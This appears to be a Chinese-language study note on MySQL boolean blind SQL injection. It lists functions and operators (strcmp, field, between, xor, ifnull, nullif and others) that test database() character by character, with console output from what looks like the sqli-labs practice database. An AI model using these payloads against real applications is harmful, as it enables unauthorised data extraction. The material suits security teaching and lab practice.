strcmp()
strcmp(str1, str2): str1 = str2 返回 0; str1 < str2 返回 -1; str1 > str2 返回 1。 mysql> select strcmp((substr(database(),1,1)),0x73); +---------------------------------------+ | strcmp((substr(database(),1,1)),0x73) | +---------------------------------------+ | 0 | +---------------------------------------+ 1 row in set (0.00 sec)
period_diff( str1 , str2 )
# 返回 str1 - str2 的差，相等时返回 0; mysql> select period_diff(ascii((substr(database(),1,1))),0x73); +---------------------------------------------------+ | period_diff(ascii((substr(database(),1,1))),0x73) | +---------------------------------------------------+ | 0 | +---------------------------------------------------+ 1 row in set (0.00 sec)
TimeDiff( str1 , str2 )
# 返回 str1 - str2 的差，相等时返回 0 mysql> select timediff(ascii((substr(database(),1,1))),115); +-----------------------------------------------+ | timediff(ascii((substr(database(),1,1))),115) | +-----------------------------------------------+ | 00:00:00 | +-----------------------------------------------+ 1 row in set (0.00 sec)
FieLd( str0 , str1 , str2 , str3 ......)
# 判断 str0 与后面哪一个字符串相等。 # 找到则返回其下标(从 1 开始)，未找到返回 0 mysql> select field('a0','a1','a2','a0'); +----------------------------+ | field('a0','a1','a2','a0') | +----------------------------+ | 3 | +----------------------------+ 1 row in set (0.00 sec) 举例用法 mysql> select field(substr(database(),1,1),'s'); +-----------------------------------+ | field(substr(database(),1,1),'s') | +-----------------------------------+ | 1 | +-----------------------------------+ 1 row in set (0.00 sec)
like
# 相当于 1=1,like 优先级 比><= 高, mysql> select * from users where id=1 like 1; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 like 0; Empty set (0.00 sec) 举例应用 mysql> select * from users where id=1 like (if(substr(database(),1,1)='s',1,0)); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)
rlike / regexp
BetWeen ... And ...
# test_str BETWEEN begin_str AND end_str mysql> select '12' between '11' and '31'; +----------------------------+ | '12' between '11' and '31' | +----------------------------+ | 1 | +----------------------------+ 1 row in set (0.00 sec) mysql> select 'ac' between 'ab' and 'ce'; +----------------------------+ | 'ac' between 'ab' and 'ce' | +----------------------------+ | 1 | +----------------------------+ 1 row in set (0.00 sec) 举例用法 mysql> select database() between 's' and 'z'; +--------------------------------+ | database() between 's' and 'z' | +--------------------------------+ | 1 | +--------------------------------+ 1 row in set (0.00 sec) select database() between 'a' and 'z'; //1 select database() between 'b' and 'z'; //1 ......... select database() between 's' and 'z'; //1 select database() between 't' and 'z'; //0 mysql> select database() between 'sa' and 'sz'; +----------------------------------+ | database() between 'sa' and 'sz' | +----------------------------------+ | 1 | +----------------------------------+ 1 row in set (0.00 sec) select database() between 'sa' and 'sz'; //1 select database() between 'sb' and 'sz'; //1 select database() between 'sc' and 'sz'; //1 ......... select database() between 'se' and 'sz'; //1 select database() between 'sf' and 'sz'; //0
IN
mysql> select * from users where id=1 and mid(database(),1,1) in (0x73); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 and mid(database(),1,2) in (0x7365); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)
AND 配合减法
#ascii('a') = 97 mysql> select * from users where id=1 and (select ascii('a')-96); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 and (select ascii('a')-97); Empty set (0.00 sec) AND 优先级高于 = , select * from users where id=1 and (select ascii('a')-97); 等同于 select * from users where id=(1 and (select ascii('a')-97));
异或运算 注入
# n ^ n = 0; n ^ 0 = n; mysql> select * from users where id=1 ^ length((select database()))-8; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 ^ 0; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=1 xor 0; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)
or 配合减法运算
mysql> select * from users where id=3 or 0; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 or 23; +----+----------+------------+ | id | username | password | +----+----------+------------+ | 1 | Dumb | Dumb | | 2 | Angelina | I-kill-you | | 3 | Dummy | p@ssword | | 4 | secure | crappy | | 5 | stupid | stupidity | | 6 | superman | genious | | 7 | batman | mob!le | | 8 | admin | admin | | 9 | admin1 | admin1 | | 10 | admin2 | admin2 | | 11 | admin3 | admin3 | | 12 | dhakkan | dumbo | | 13 | admin4 | admin4 | | 14 | admin5 | admin5 | +----+----------+------------+ 14 rows in set (0.00 sec) 举例使用 mysql> select * from users where id=3 or ascii(mid(database(),1,1))-115; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 or ascii(mid(database(),1,1))-0x73; +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec)
if()
mysql> select if(1=1,1,0); +-------------+ | if(1=1,1,0) | +-------------+ | 1 | +-------------+ 1 row in set (0.00 sec) mysql> select if(1=2,1,0); +-------------+ | if(1=2,1,0) | +-------------+ | 0 | +-------------+ 1 row in set (0.00 sec) 举例使用 mysql> select * from users where id=3 and if(mid(database(),1,1)='s',1,0); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec)
ifnull(表达式1,表达式2)
# 如果 exp1 为 null，则返回 exp2 的值，否则返回 exp1 的值 # 在注入的时候，重要的是 exp1 返回的值是否为 0 mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x73,0x20); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x74,0x20); Empty set (0.00 sec) mysql> select * from users where id=3 and ifnull(mid(database(),1,1)=0x78,0x20); Empty set (0.02 sec)
nullif(表达式1,表达式2)
# 如果 exp1 = exp2，返回 null；如果不相等，返回 exp1 的值 # exp2 的取值不重要 mysql> select * from users where id=3 and nullif(mid(database(),1,1)='s',2); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 3 | Dummy | p@ssword | +----+----------+----------+ 1 row in set (0.00 sec) mysql> select * from users where id=3 and nullif(mid(database(),1,1)='a',2); Empty set (0.00 sec)